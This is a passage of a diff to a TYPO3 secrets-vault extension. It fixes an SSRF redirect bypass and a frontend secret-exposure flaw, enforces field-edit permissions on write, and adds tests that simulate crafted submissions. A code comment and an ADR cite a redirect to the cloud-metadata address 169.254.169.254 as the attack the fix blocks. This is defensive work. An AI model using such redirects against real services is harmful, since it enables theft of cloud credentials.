         $this->logger->error(self::LOG_MESSAGE, $logContext);
 
@@ -95,7 +95,7 @@ final readonly class VaultFailureReporter
      * length (so repeated failures cannot inflate the log), then force valid
      * UTF-8 so the record survives `json_encode()`.
      */
-    private static function sanitiseForLog(string $value): string
+    private function sanitiseForLog(string $value): string
     {
         // Byte-wise class, deliberately without the /u modifier: it matches C0
         // plus DEL, leaves UTF-8 continuation bytes alone, and cannot fail (and
@@ -114,7 +114,6 @@ final readonly class VaultFailureReporter
 
     private function getMessageTemplate(): string
     {
-        /** @var mixed $languageService */
         $languageService = $GLOBALS['LANG'] ?? null;
 
         if (!$languageService instanceof LanguageService) {

--- a/Classes/Http/SecureHttpClientFactory.php
+++ b/Classes/Http/SecureHttpClientFactory.php
@@ -233,11 +233,11 @@ final class SecureHttpClientFactory
      *  - Host that resolves to a dangerous IP → the request is rejected
      *    with a `RequestException` BEFORE the socket opens.
      *  - Host that cannot be resolved at all → no pin is added; curl handles
-     *    the resolution failure with its usual error path. (The caller's
-     *    earlier `isHostAllowed()` check already rejected IP-literal targets
-     *    in dangerous ranges.)
-     *  - IP-literal hosts (already an IPv4/IPv6 address) → no pin needed;
-     *    `isHostAllowed()` validated the literal directly.
+     *    the resolution failure with its usual error path.
+     *  - IP-literal hosts (already an IPv4/IPv6 address) → no pin needed, but
+     *    the literal is range-checked here as well: this middleware also runs
+     *    for redirect hops, which never pass the caller's `isHostAllowed()`
+     *    gate (only the first request URI does).
      */
     private function buildSsrfDefenceMiddleware(): Closure /** @phpstan-ignore missingType.callable (Guzzle's middleware contract is loosely-typed by design) */
     {
@@ -336,10 +336,11 @@ final class SecureHttpClientFactory
      *  - `null` if the host resolved to AT LEAST ONE dangerous IP and is NOT
      *    explicitly allowlisted (the entire request must be rejected — even if
      *    some A records look safe, the presence of a dangerous answer signals
-     *    an active rebinding attempt).
-     *  - `[]` if the host is an IP literal (no pin needed), if resolution
-     *    failed entirely, or if it yielded no usable A/AAAA address (let curl
-     *    handle the error path).
+     *    an active rebinding attempt), or if the host IS an IP literal in a
+     *    dangerous range and is NOT explicitly allowlisted.
+     *  - `[]` if the host is a safe (or allowlisted) IP literal — no pin
+     *    needed —, if resolution failed entirely, or if it yielded no usable
+     *    A/AAAA address (let curl handle the error path).
      *  - a single-element `list<string>` carrying the pin entry for safe
      *    multi-record hosts.
      *
@@ -354,8 +355,18 @@ final class SecureHttpClientFactory
      */
     private function buildResolveEntries(string $host, int $port, bool $allowlisted = false): ?array
     {
-        // IP literal — `isHostAllowed()` already validated it; no DNS to pin.
+        // IP literal — no DNS to pin, but the literal itself is still
+        // range-checked HERE. The middleware must be self-sufficient: it runs
+        // below Guzzle's RedirectMiddleware, so EVERY redirect hop re-enters
+        // it while only the FIRST URI ever passed the caller-side
+        // `isHostAllowed()` gate. Trusting that pre-check let a
+        // `302 Location: http://169.254.169.254/` hop reach cloud metadata.
+        // A literal `allowed_hosts` entry still opts the host back in.
         if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
+            if (!$allowlisted && $this->isDangerousIpLiteral($host)) {
+                return null;
+            }
+
             return [];
         }
 

--- a/Classes/Security/AccessControlService.php
+++ b/Classes/Security/AccessControlService.php
@@ -14,11 +14,13 @@ namespace Netresearch\NrVault\Security;
 
 use Netresearch\NrVault\Configuration\ExtensionConfigurationInterface;
 use Netresearch\NrVault\Domain\Model\Secret;
+use Psr\Http\Message\ServerRequestInterface;
 use Throwable;
 use TYPO3\CMS\Core\Authentication\BackendUserAuthentication;
 use TYPO3\CMS\Core\Authentication\CommandLineUserAuthentication;
 use TYPO3\CMS\Core\Database\Connection;
 use TYPO3\CMS\Core\Database\ConnectionPool;
+use TYPO3\CMS\Core\Http\ApplicationType;
 
 /**
  * Access control service implementation.
@@ -294,6 +296,19 @@ final class AccessControlService implements AccessControlServiceInterface
             return $this->hasTechnicalActorAccess($technicalActor, $secret, $permission);
         }
 
+        // A FRONTEND request never takes the backend-user branch below, no
+        // matter what $GLOBALS['BE_USER'] happens to hold: TYPO3's frontend
+        // BackendUserAuthenticator middleware populates that global for ANY
+        // visitor who carries a valid backend session, so branching on its
+        // mere presence evaluates an ambient backend identity for a request
+        // whose output is shared (page cache) with anonymous visitors. The
+        // request's application type decides instead — in the frontend only
+        // the explicit `frontend_accessible` READ gate applies, exactly as
+        // for an anonymous visitor.
+        if ($this->isFrontendRequest()) {
+            return $this->hasFrontendAccess($secret, $permission);
+        }
+
         $backendUser = $this->getBackendUser();
 
         // An UNAUTHENTICATED CommandLineUserAuthentication must not take the
@@ -323,15 +338,57 @@ final class AccessControlService implements AccessControlServiceInterface
             return $this->hasCliAccess($secret, $permission);
         }
 
-        // Frontend access for secrets explicitly marked as frontend_accessible.
-        // This allows TypoScript and other frontend contexts to resolve vault
-        // placeholders. Frontend is READ-ONLY — write/delete are never granted
-        // without a backend or CLI actor. No backend user and not CLI.
+        // No backend user and not CLI: fall back to the frontend gate.
+        return $this->hasFrontendAccess($secret, $permission);
+    }
+
+    /**
+     * Frontend access for secrets explicitly marked as frontend_accessible.
+     * This allows TypoScript and other frontend contexts to resolve vault
+     * placeholders. Frontend is READ-ONLY — write/delete are never granted
+     * without a backend, CLI or technical actor.
+     *
+     * @param self::PERMISSION_* $permission
+     */
+    private function hasFrontendAccess(Secret $secret, string $permission): bool
+    {
         if ($permission !== self::PERMISSION_READ) {
             return false;
         }
 
         return $secret->isFrontendAccessible();
+    }
+
+    /**
+     * Is the current request a TYPO3 *frontend* request?
+     *
+     * The request's `applicationType` attribute is core's only authoritative
+     * answer (`ApplicationType::fromRequest()`). It is read from
+     * `$GLOBALS['TYPO3_REQUEST']` — the fallback core documents for library
+     * code that does not receive the PSR-7 request — because this service is
+     * called from hooks, listeners and commands that cannot hand one down.
+     *
+     * Returns false whenever the application type cannot be established:
+     * no request at all (CLI, Symfony Messenger worker, scheduler, install
+     * tool bootstrap, unit tests) or a request that carries no valid
+     * `applicationType` attribute. Those callers keep exactly the behaviour
+     * they have today; only a request positively identified as frontend is
+     * routed to the frontend gate.
+     */
+    private function isFrontendRequest(): bool
+    {
+        $request = $GLOBALS['TYPO3_REQUEST'] ?? null;
+        if (!$request instanceof ServerRequestInterface) {
+            return false;
+        }
+
+        try {
+            return ApplicationType::fromRequest($request)->isFrontend();
+        } catch (Throwable) {
+            // fromRequest() throws when the request was not created by a
+            // TYPO3 frontend / backend / install application.
+            return false;
+        }
     }
 
     /**

--- a/Classes/Service/VaultService.php
+++ b/Classes/Service/VaultService.php
@@ -204,6 +204,36 @@ final class VaultService implements VaultServiceInterface, SingletonInterface
         return $plaintext;
     }
 
+    public function retrieveForFrontend(string $identifier): ?string
+    {
+        $secret = $this->adapter->retrieve($identifier);
+        if (!$secret instanceof Secret) {
+            return null;
+        }
+
+        // Frontend visibility is a property of the SECRET, never of whoever
+        // happens to render the page. `retrieve()` alone would decide against
+        // the ambient actor — AccessControlService takes its backend-user
+        // branch as soon as $GLOBALS['BE_USER'] is set, which is the case for
+        // a backend user browsing the frontend — and would hand out a secret
+        // that was deliberately withheld from the frontend, into output that
+        // is shared (page cache) with anonymous visitors.
+        if (!$secret->isFrontendAccessible()) {
+            $this->auditLogService->log(
+                $identifier,
+                AuditAction::AccessDenied->value,
+                false,
+                'Frontend read access denied: secret is not frontend accessible',
+            );
+
+            throw AccessDeniedException::forIdentifier($identifier, 'not frontend accessible');
+        }
+
+        // The remaining checks (read permission, expiry), the audit trail and
+        // the decryption stay with the single read path.
+        return $this->retrieve($identifier);
+    }
+
     public function exists(string $identifier): bool
     {
         return $this->adapter->exists($identifier);

--- a/Classes/Service/VaultServiceInterface.php
+++ b/Classes/Service/VaultServiceInterface.php
@@ -55,6 +55,25 @@ interface VaultServiceInterface
     public function retrieve(string $identifier): ?string;
 
     /**
+     * Retrieve a secret for rendering in the frontend.
+     *
+     * Frontend-scoped counterpart of `retrieve()`: only secrets flagged
+     * `frontend_accessible` are resolvable here, and that requirement holds
+     * for every caller — including a request that happens to carry a backend
+     * session (`$GLOBALS['BE_USER']`), whose ambient privileges would
+     * otherwise widen `retrieve()`'s access decision. Everything else
+     * (expiry, decryption, audit logging, read statistics) behaves as in
+     * `retrieve()`.
+     *
+     * @throws AccessDeniedException If the secret is not frontend-accessible, or the current actor lacks read permission
+     * @throws EncryptionException If decryption fails
+     * @throws SecretExpiredException If secret has expired
+     *
+     * @return string|null The secret value, or null if not found
+     */
+    public function retrieveForFrontend(string $identifier): ?string;
+
+    /**
      * Check if a secret exists.
      */
     public function exists(string $identifier): bool;

--- a/Documentation/Developer/Adr/ADR-005-AccessControl.rst
+++ b/Documentation/Developer/Adr/ADR-005-AccessControl.rst
@@ -292,7 +292,7 @@ Actor context
 Field-level permissions (TSconfig)
 ----------------------------------
 
-Additional UI-level control via TSconfig:
+Additional field-level control via TSconfig:
 
 .. code-block:: typoscript
    :caption: TSconfig for field permissions
@@ -310,6 +310,15 @@ Additional UI-level control via TSconfig:
            copy = 0
        }
    }
+
+``reveal`` and ``copy`` only affect the rendered form element. ``edit`` and
+``readOnly`` are additionally enforced on the DataHandler write path for TCA
+vault fields: a value submitted for a protected field is discarded and reported
+to the editor, so stripping the ``readonly`` attribute in the browser gains
+nothing. Two limits remain: the settings are read from the global (page 0)
+TSconfig rather than from the edited record's page, and vault fields embedded in
+FlexForms — which resolve their permissions under the *FlexForm column* name —
+are not re-checked on write.
 
 Consequences
 ============

--- a/Documentation/Developer/Adr/ADR-026-DnsRebindingDefence.rst
+++ b/Documentation/Developer/Adr/ADR-026-DnsRebindingDefence.rst
@@ -76,8 +76,13 @@ middleware runs per outgoing request:
     option (``host:port:ip`` for IPv4, ``host:port:[ipv6]`` for
     IPv6 — colons in v6 require brackets in CURLOPT_RESOLVE's
     field-delimiter format).
-6.  IP literals (already validated by ``isHostAllowed``) and
-    unresolvable hosts pass through without a pin.
+6.  IP literals need no pin, but are range-checked here as well
+    (``isDangerousIpLiteral()``, honouring an explicit
+    ``allowed_hosts`` entry): the middleware sits below Guzzle's
+    redirect middleware, so it also runs for redirect hops, and
+    those never pass the caller's ``isHostAllowed()`` gate — only
+    the first request URI does. Unresolvable hosts pass through
+    without a pin.
 
 curl then skips its own DNS step and connects to the IP we just
 validated. No second resolution, no rebinding window.
@@ -119,9 +124,10 @@ Negative
 Verified
 ========
 
--  Unit tests cover the four resolution outcomes (safe IPs → pin,
-   any-dangerous → reject, IP literal → no pin, unresolvable → no
-   pin).
+-  Unit tests cover the resolution outcomes (safe IPs → pin,
+   any-dangerous → reject, safe or allowlisted IP literal → no pin,
+   dangerous IP literal → reject, unresolvable → no pin) plus a
+   redirect hop to ``169.254.169.254`` at middleware level.
 -  Integration tests assert the ``ssrf-dns-pin`` middleware is
    registered on every factory-built ``HandlerStack``.
 -  Regression test for the IPv6-bracket normalisation.

--- a/Resources/Private/Language/locallang.xlf
+++ b/Resources/Private/Language/locallang.xlf
@@ -7,6 +7,11 @@
                 <source>Secret stored in vault (enter new value to update)</source>
             </trans-unit>
 
+            <!-- DataHandler hooks: vault operation failure -->
+            <trans-unit id="hook.vaultFailure.reference">
+                <source>The vault operation could not be completed. Please ask an administrator to check the vault log for reference %s.</source>
+            </trans-unit>
+
             <!-- Scheduler Task: Orphan Cleanup -->
             <trans-unit id="task.orphanCleanup.title">
                 <source>Vault Orphan Cleanup</source>

--- a/Tests/Functional/Audit/AuditRequestHeaderWidthTest.php
+++ b/Tests/Functional/Audit/AuditRequestHeaderWidthTest.php
@@ -1,0 +1,67 @@
+<?php
+
+/*
+ * Copyright (c) 2025-2026 Netresearch DTT GmbH
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
+
+declare(strict_types=1);
+
+namespace Netresearch\NrVault\Tests\Functional\Audit;
+
+use Netresearch\NrVault\Audit\AuditLogService;
+use Netresearch\NrVault\Audit\AuditLogServiceInterface;
+use Netresearch\NrVault\Tests\Functional\AbstractVaultFunctionalTestCase;
+use PHPUnit\Framework\Attributes\CoversClass;
+use PHPUnit\Framework\Attributes\Test;
+use TYPO3\CMS\Core\Http\ServerRequest;
+
+/**
+ * F8 — the audit row's `user_agent` and `request_id` are taken verbatim from
+ * request headers a client fully controls and stored in fixed-width columns
+ * (`varchar(500)` / `varchar(100)`).
+ *
+ * Against a real database this pins both halves of the failure the clip
+ * prevents: an oversized header must not abort the INSERT (strict `sql_mode`),
+ * and it must not be truncated by the database behind the entry hash's back —
+ * which would turn every later verification of that row into a false tamper
+ * alarm. Epoch 3 is used because that is the payload that binds `user_agent`
+ * and `request_id` into the HMAC.
+ */
+#[CoversClass(AuditLogService::class)]
+final class AuditRequestHeaderWidthTest extends AbstractVaultFunctionalTestCase
+{
+    protected ?string $backendUserFixture = __DIR__ . '/../../Functional/Service/Fixtures/be_users.csv';
+
+    /** @var array<string, mixed> */
+    protected array $extensionConfiguration = [
+        'auditHmacEpoch' => 3,
+    ];
+
+    #[Test]
+    public function oversizedRequestHeadersAreStoredClippedAndLeaveTheChainVerifiable(): void
+    {
+        $GLOBALS['TYPO3_REQUEST'] = (new ServerRequest('https://example.com/', 'GET'))
+            ->withHeader('X-Request-Id', str_repeat('A', 200))
+            ->withHeader('User-Agent', str_repeat('B', 900));
+
+        $auditService = $this->get(AuditLogServiceInterface::class);
+        $identifier = 'test_audit_header_width';
+
+        $auditService->log($identifier, 'create', true);
+
+        $row = $this->getConnectionPool()
+            ->getConnectionForTable('tx_nrvault_audit_log')
+            ->select(['request_id', 'user_agent'], 'tx_nrvault_audit_log', ['secret_identifier' => $identifier])
+            ->fetchAssociative();
+
+        self::assertIsArray($row, 'The audit write must succeed despite the oversized headers');
+        self::assertSame(str_repeat('A', 100), $row['request_id'], 'request_id fits varchar(100)');
+        self::assertSame(str_repeat('B', 500), $row['user_agent'], 'user_agent fits varchar(500)');
+
+        self::assertTrue(
+            $auditService->verifyHashChain()->isValid(),
+            'The entry hash must cover the stored bytes — a database-side truncation would break verification',
+        );
+    }
+}

--- a/Tests/Functional/EventListener/TypoScriptVaultListenerTest.php
+++ b/Tests/Functional/EventListener/TypoScriptVaultListenerTest.php
@@ -28,6 +28,9 @@ final class TypoScriptVaultListenerTest extends AbstractVaultFunctionalTestCase
 {
     private const REASON_TEST_CLEANUP = 'test cleanup';
 
+    /** @var array<string, bool> Store options marking a secret resolvable in the frontend. */
+    private const FRONTEND_ACCESSIBLE = ['frontendAccessible' => true];
+
     /** @var list<string> */
     protected array $coreExtensionsToLoad = [
         'backend',
@@ -46,7 +49,7 @@ final class TypoScriptVaultListenerTest extends AbstractVaultFunctionalTestCase
     {
         $vaultService = $this->get(VaultServiceInterface::class);
         $identifier = 'ts_apikey_' . bin2hex(random_bytes(4));
-        $vaultService->store($identifier, 'resolved-typoscript-secret');
+        $vaultService->store($identifier, 'resolved-typoscript-secret', self::FRONTEND_ACCESSIBLE);
 
         $listener = $this->get(TypoScriptVaultListener::class);
         $event = $this->createEvent(\sprintf('%%vault(%s)%%', $identifier));
@@ -64,7 +67,7 @@ final class TypoScriptVaultListenerTest extends AbstractVaultFunctionalTestCase
     {
         $vaultService = $this->get(VaultServiceInterface::class);
         $identifier = 'ts_embedded_' . bin2hex(random_bytes(4));
-        $vaultService->store($identifier, 'my-api-key');
+        $vaultService->store($identifier, 'my-api-key', self::FRONTEND_ACCESSIBLE);
 
         $listener = $this->get(TypoScriptVaultListener::class);
         $content = \sprintf('Bearer %%vault(%s)%%', $identifier);
@@ -73,6 +76,33 @@ final class TypoScriptVaultListenerTest extends AbstractVaultFunctionalTestCase
         $listener($event);
 
         self::assertSame('Bearer my-api-key', $event->getContent());
+
+        // Cleanup
+        $vaultService->delete($identifier, self::REASON_TEST_CLEANUP);
+    }
+
+    #[Test]
+    public function listenerDoesNotResolveSecretWithoutFrontendAccess(): void
+    {
+        // The base test case logs in the admin backend user (uid 1), i.e. the
+        // frontend renders with an ambient backend session that grants read
+        // access to every secret. A secret withheld from the frontend must
+        // still not be resolved into the (cacheable) page output.
+        $vaultService = $this->get(VaultServiceInterface::class);
+        $identifier = 'ts_private_' . bin2hex(random_bytes(4));
+        $vaultService->store($identifier, 'smtp-password-never-in-frontend');
+
+        $listener = $this->get(TypoScriptVaultListener::class);
+        $placeholder = \sprintf('%%vault(%s)%%', $identifier);
+        $event = $this->createEvent($placeholder);
+
+        $listener($event);
+
+        self::assertSame(
+            $placeholder,
+            $event->getContent(),
+            'A secret that is not frontend_accessible must stay unresolved even with a backend session',
+        );
 
         // Cleanup
         $vaultService->delete($identifier, self::REASON_TEST_CLEANUP);
@@ -110,8 +140,8 @@ final class TypoScriptVaultListenerTest extends AbstractVaultFunctionalTestCase
         $prefix = 'ts_multi_' . bin2hex(random_bytes(4));
         $id1 = $prefix . '_k1';
         $id2 = $prefix . '_k2';
-        $vaultService->store($id1, 'first-value');
-        $vaultService->store($id2, 'second-value');
+        $vaultService->store($id1, 'first-value', self::FRONTEND_ACCESSIBLE);
+        $vaultService->store($id2, 'second-value', self::FRONTEND_ACCESSIBLE);
 
         $listener = $this->get(TypoScriptVaultListener::class);
         $content = \sprintf('%%vault(%s)%%:%%vault(%s)%%', $id1, $id2);

--- a/Tests/Functional/Hook/DataHandlerHookTest.php
+++ b/Tests/Functional/Hook/DataHandlerHookTest.php
@@ -15,6 +15,7 @@ use Netresearch\NrVault\Crypto\EncryptionServiceInterface;
 use Netresearch\NrVault\Hook\DataHandlerHook;
 use Netresearch\NrVault\Hook\PendingSecretExtractor;
 use Netresearch\NrVault\Hook\PendingSecretPersister;
+use Netresearch\NrVault\Hook\VaultFailureReporter;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Netresearch\NrVault\Tests\Functional\AbstractVaultFunctionalTestCase;
 use Netresearch\NrVault\Utility\VaultFieldResolver;
@@ -271,6 +272,7 @@ final class DataHandlerHookTest extends AbstractVaultFunctionalTestCase
             $this->get(VaultFieldResolver::class),
             $this->get(PendingSecretExtractor::class),
             $this->get(PendingSecretPersister::class),
+            $this->get(VaultFailureReporter::class),
         );
 
         // Pre-seed the field cache via reflection (setAccessible is a no-op since PHP 8.1)

--- a/Tests/Functional/Hook/DataHandlerHookTest.php
+++ b/Tests/Functional/Hook/DataHandlerHookTest.php
@@ -16,10 +16,12 @@ use Netresearch\NrVault\Hook\DataHandlerHook;
 use Netresearch\NrVault\Hook\PendingSecretExtractor;
 use Netresearch\NrVault\Hook\PendingSecretPersister;
 use Netresearch\NrVault\Hook\VaultFailureReporter;
+use Netresearch\NrVault\Service\VaultFieldPermissionService;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Netresearch\NrVault\Tests\Functional\AbstractVaultFunctionalTestCase;
 use Netresearch\NrVault\Utility\VaultFieldResolver;
 use PHPUnit\Framework\Attributes\CoversClass;
+use PHPUnit\Framework\Attributes\DataProvider;
 use PHPUnit\Framework\Attributes\Test;
 use ReflectionProperty;
 use Throwable;
@@ -193,6 +195,107 @@ final class DataHandlerHookTest extends AbstractVaultFunctionalTestCase
         }
     }
 
+    /**
+     * A field the page TSconfig marks as non-editable (`edit = 0`) or read-only
+     * (`readOnly = 1`) must not be writable through a hand-crafted submission:
+     * the FormEngine element only renders such a field `readonly`, which a
+     * client can strip.
+     */
+    #[Test]
+    #[DataProvider('nonEditableFieldProvider')]
+    public function hookKeepsStoredSecretWhenTsConfigForbidsEditing(string $fieldName): void
+    {
+        $this->setUpVaultFieldPermissionUser();
+
+        $vaultService = $this->get(VaultServiceInterface::class);
+        $hook = $this->createHookWithVaultFields('tx_test', [$fieldName]);
+
+        $vaultIdentifier = $this->generateUuidV7();
+        $originalValue = 'protected-value';
+        $vaultService->store($vaultIdentifier, $originalValue);
+
+        try {
+            $fieldArray = [
+                $fieldName => [
+                    'value' => 'value-from-crafted-post',
+                    '_vault_identifier' => $vaultIdentifier,
+                    '_vault_checksum' => hash('sha256', $vaultIdentifier),
+                ],
+            ];
+
+            $dataHandler = $this->createDataHandler();
+            $hook->processDatamap_preProcessFieldArray($fieldArray, 'tx_test', 99, $dataHandler);
+            self::assertArrayNotHasKey($fieldName, $fieldArray, 'Denied field must be dropped from the datamap');
+
+            $hook->processDatamap_afterDatabaseOperations('update', 'tx_test', 99, $fieldArray, $dataHandler);
+
+            $vaultService->clearCache();
+            self::assertSame(
+                $originalValue,
+                $vaultService->retrieve($vaultIdentifier),
+                'Stored secret must survive a submission to a TSconfig-protected field',
+            );
+            self::assertNotEmpty(
+                $dataHandler->errorLog,
+                'The discarded value must be reported to the editor',
+            );
+        } finally {
+            $this->safeDelete($vaultService, $vaultIdentifier);
+        }
+    }
+
+    /**
+     * Control for {@see self::hookKeepsStoredSecretWhenTsConfigForbidsEditing()}:
+     * the same user, the same submission shape and the same vault ACL — only the
+     * TSconfig restriction is missing, and the secret is rotated as before.
+     */
+    #[Test]
+    public function hookRotatesSecretOfFieldWithoutTsConfigRestriction(): void
+    {
+        $this->setUpVaultFieldPermissionUser();
+
+        $vaultService = $this->get(VaultServiceInterface::class);
+        $hook = $this->createHookWithVaultFields('tx_test', ['secret_unrestricted']);
+
+        $vaultIdentifier = $this->generateUuidV7();
+        $vaultService->store($vaultIdentifier, 'original-value');
+
+        try {
+            $newValue = 'value-from-regular-save';
+            $fieldArray = [
+                'secret_unrestricted' => [
+                    'value' => $newValue,
+                    '_vault_identifier' => $vaultIdentifier,
+                    '_vault_checksum' => hash('sha256', $vaultIdentifier),
+                ],
+            ];
+
+            $dataHandler = $this->createDataHandler();
+            $hook->processDatamap_preProcessFieldArray($fieldArray, 'tx_test', 99, $dataHandler);
+            self::assertSame($vaultIdentifier, $fieldArray['secret_unrestricted'], 'Existing identifier must be preserved');
+
+            $hook->processDatamap_afterDatabaseOperations('update', 'tx_test', 99, $fieldArray, $dataHandler);
+
+            $vaultService->clearCache();
+            self::assertSame(
+                $newValue,
+                $vaultService->retrieve($vaultIdentifier),
+                'An unrestricted field must still be writable for the same user',
+            );
+        } finally {
+            $this->safeDelete($vaultService, $vaultIdentifier);
+        }
+    }
+
+    /**
+     * @return iterable<string, array{string}>
+     */
+    public static function nonEditableFieldProvider(): iterable
+    {
+        yield 'edit denied' => ['secret_edit_denied'];
+        yield 'read-only' => ['secret_read_only'];
+    }
+
     #[Test]
     public function hookDeletesVaultSecretOnRecordDelete(): void
     {
@@ -273,6 +376,7 @@ final class DataHandlerHookTest extends AbstractVaultFunctionalTestCase
             $this->get(PendingSecretExtractor::class),
             $this->get(PendingSecretPersister::class),
             $this->get(VaultFailureReporter::class),
+            $this->get(VaultFieldPermissionService::class),
         );
 
         // Pre-seed the field cache via reflection (setAccessible is a no-op since PHP 8.1)
@@ -280,6 +384,18 @@ final class DataHandlerHookTest extends AbstractVaultFunctionalTestCase
         $cacheProperty->setValue($hook, [$table => $vaultFields]);
 
         return $hook;
+    }
+
+    /**
+     * Log in the non-admin editor whose user TSconfig carries the
+     * `vault.permissions` restrictions used by the field-permission tests.
+     * Administrators bypass the TSconfig gate, so the default admin user of
+     * this test case cannot exercise it.
+     */
+    private function setUpVaultFieldPermissionUser(): void
+    {
+        $this->importCSVDataSet(__DIR__ . '/Fixtures/be_users_field_permissions.csv');
+        $this->setUpBackendUser(2);
     }
 
     /**

--- a/Tests/Functional/Hook/Fixtures/be_users_field_permissions.csv
+++ b/Tests/Functional/Hook/Fixtures/be_users_field_permissions.csv
@@ -1,0 +1,4 @@
+"be_users"
+,"uid","username","admin","disable","starttime","endtime","TSconfig"
+,2,"vault_field_permission_editor",0,0,0,0,"page.vault.permissions.tx_test.secret_edit_denied.edit = 0
+page.vault.permissions.tx_test.secret_read_only.readOnly = 1"

--- a/Tests/Functional/Hook/Fixtures/non-vault-data-structure.xml
+++ b/Tests/Functional/Hook/Fixtures/non-vault-data-structure.xml
@@ -1,0 +1,18 @@
+<T3DataStructure>
+    <sheets>
+        <sDEF>
+            <ROOT>
+                <sheetTitle>Vault hook test sheet</sheetTitle>
+                <type>array</type>
+                <el>
+                    <apiKey>
+                        <label>API key rendered as a plain input</label>
+                        <config>
+                            <type>input</type>
+                        </config>
+                    </apiKey>
+                </el>
+            </ROOT>
+        </sDEF>
+    </sheets>
+</T3DataStructure>

--- a/Tests/Functional/Hook/FlexFormVaultHookTest.php
+++ b/Tests/Functional/Hook/FlexFormVaultHookTest.php
@@ -107,10 +107,21 @@ final class FlexFormVaultHookTest extends AbstractVaultFunctionalTestCase
         }
     }
 
+    /**
+     * A submitted vault value whose field the data structure does not describe as
+     * a `vaultSecret` element must be discarded rather than handed to DataHandler,
+     * which would serialise it into the FlexForm XML as cleartext.
+     *
+     * The trigger is the element type rather than an unresolvable data structure
+     * file: TYPO3 v13.4 resolves every FlexForm data structure while building the
+     * TCA schema, so a TCA pointing at a missing file throws in
+     * `TcaSchemaFactory::rebuild()` before the hook is ever reached. Both paths
+     * end in the same fail-closed strip.
+     */
     #[Test]
-    public function hookDiscardsSubmittedSecretWhenDataStructureCannotBeResolved(): void
+    public function hookDiscardsSubmittedSecretWhenFieldIsNotAVaultElement(): void
     {
-        $this->registerDataStructure('FILE:EXT:nr_vault/Tests/Functional/Hook/Fixtures/no-such-data-structure.xml');
+        $this->registerDataStructure('FILE:EXT:nr_vault/Tests/Functional/Hook/Fixtures/non-vault-data-structure.xml');
 
         $hook = $this->get(FlexFormVaultHook::class);
 
@@ -122,7 +133,7 @@ final class FlexFormVaultHookTest extends AbstractVaultFunctionalTestCase
         self::assertStringNotContainsString(
             $secretValue,
             (string) json_encode($fieldArray),
-            'An unresolvable data structure must not let the plaintext through to DataHandler',
+            'A field that is not a vault secret element must not let the plaintext through to DataHandler',
         );
         self::assertSame(
             '',
@@ -134,7 +145,7 @@ final class FlexFormVaultHookTest extends AbstractVaultFunctionalTestCase
     #[Test]
     public function hookKeepsExistingIdentifierWhenDiscardingSubmittedSecret(): void
     {
-        $this->registerDataStructure('FILE:EXT:nr_vault/Tests/Functional/Hook/Fixtures/no-such-data-structure.xml');
+        $this->registerDataStructure('FILE:EXT:nr_vault/Tests/Functional/Hook/Fixtures/non-vault-data-structure.xml');
 
         $hook = $this->get(FlexFormVaultHook::class);
 
@@ -147,7 +158,7 @@ final class FlexFormVaultHookTest extends AbstractVaultFunctionalTestCase
         self::assertStringNotContainsString(
             $secretValue,
             (string) json_encode($fieldArray),
-            'An unresolvable data structure must not let the plaintext through to DataHandler',
+            'A field that is not a vault secret element must not let the plaintext through to DataHandler',
         );
         self::assertSame(
             $existingIdentifier,

--- a/Tests/Functional/Hook/FlexFormVaultHookTest.php
+++ b/Tests/Functional/Hook/FlexFormVaultHookTest.php
@@ -1,0 +1,225 @@
+<?php
+
+/*
+ * Copyright (c) 2025-2026 Netresearch DTT GmbH
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
+
+declare(strict_types=1);
+
+namespace Netresearch\NrVault\Tests\Functional\Hook;
+
+use Netresearch\NrVault\Hook\FlexFormVaultHook;
+use Netresearch\NrVault\Service\VaultServiceInterface;
+use Netresearch\NrVault\Tests\Functional\AbstractVaultFunctionalTestCase;
+use PHPUnit\Framework\Attributes\CoversClass;
+use PHPUnit\Framework\Attributes\Test;
+use Throwable;
+use TYPO3\CMS\Core\DataHandling\DataHandler;
+use TYPO3\CMS\Core\Information\Typo3Version;
+use TYPO3\CMS\Core\Schema\TcaSchemaFactory;
+use TYPO3\CMS\Core\Utility\GeneralUtility;
+
+/**
+ * Functional tests for FlexFormVaultHook against the real FlexFormTools.
+ *
+ * The unit tests mock FlexFormTools, so they cannot catch a data structure
+ * lookup that fails on the running core — which silently disabled the whole
+ * hook and persisted the submitted secret as cleartext in the record XML.
+ * These tests therefore resolve the data structure through the container's
+ * FlexFormTools on whichever TYPO3 major the suite runs on.
+ */
+#[CoversClass(FlexFormVaultHook::class)]
+final class FlexFormVaultHookTest extends AbstractVaultFunctionalTestCase
+{
+    private const DATA_STRUCTURE = '<T3DataStructure>
+        <sheets>
+            <sDEF>
+                <ROOT>
+                    <type>array</type>
+                    <el>
+                        <apiKey>
+                            <label>API Key</label>
+                            <config>
+                                <type>input</type>
+                                <renderType>vaultSecret</renderType>
+                            </config>
+                        </apiKey>
+                    </el>
+                </ROOT>
+            </sDEF>
+        </sheets>
+    </T3DataStructure>';
+
+    /** @var list<string> */
+    protected array $coreExtensionsToLoad = [
+        'backend',
+        'frontend',
+    ];
+
+    protected ?string $backendUserFixture = __DIR__ . '/Fixtures/be_users.csv';
+
+    /** @var array<string, mixed> */
+    protected array $extensionConfiguration = [
+        'auditHmacEpoch' => 1,
+    ];
+
+    #[Test]
+    public function hookStoresSubmittedFlexFormSecretInVaultInsteadOfTheRecord(): void
+    {
+        $this->registerDataStructure(self::DATA_STRUCTURE);
+
+        $vaultService = $this->get(VaultServiceInterface::class);
+        $hook = $this->get(FlexFormVaultHook::class);
+
+        $secretValue = 'flexform-api-key-value';
+        $fieldArray = $this->buildFieldArray($secretValue);
+
+        $hook->processDatamap_preProcessFieldArray($fieldArray, 'tt_content', 'NEW1');
+
+        $vaultIdentifier = $fieldArray['pi_flexform']['data']['sDEF']['lDEF']['apiKey']['vDEF'];
+
+        self::assertIsString($vaultIdentifier, 'The submitted value array must be collapsed to an identifier');
+        self::assertMatchesRegularExpression(
+            '/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i',
+            $vaultIdentifier,
+            'The FlexForm field must carry a vault identifier',
+        );
+        self::assertStringNotContainsString(
+            $secretValue,
+            (string) json_encode($fieldArray),
+            'No plaintext may reach DataHandler, which would serialise it into the FlexForm XML',
+        );
+
+        try {
+            $dataHandler = $this->createDataHandler();
+            $dataHandler->substNEWwithIDs['NEW1'] = 4711;
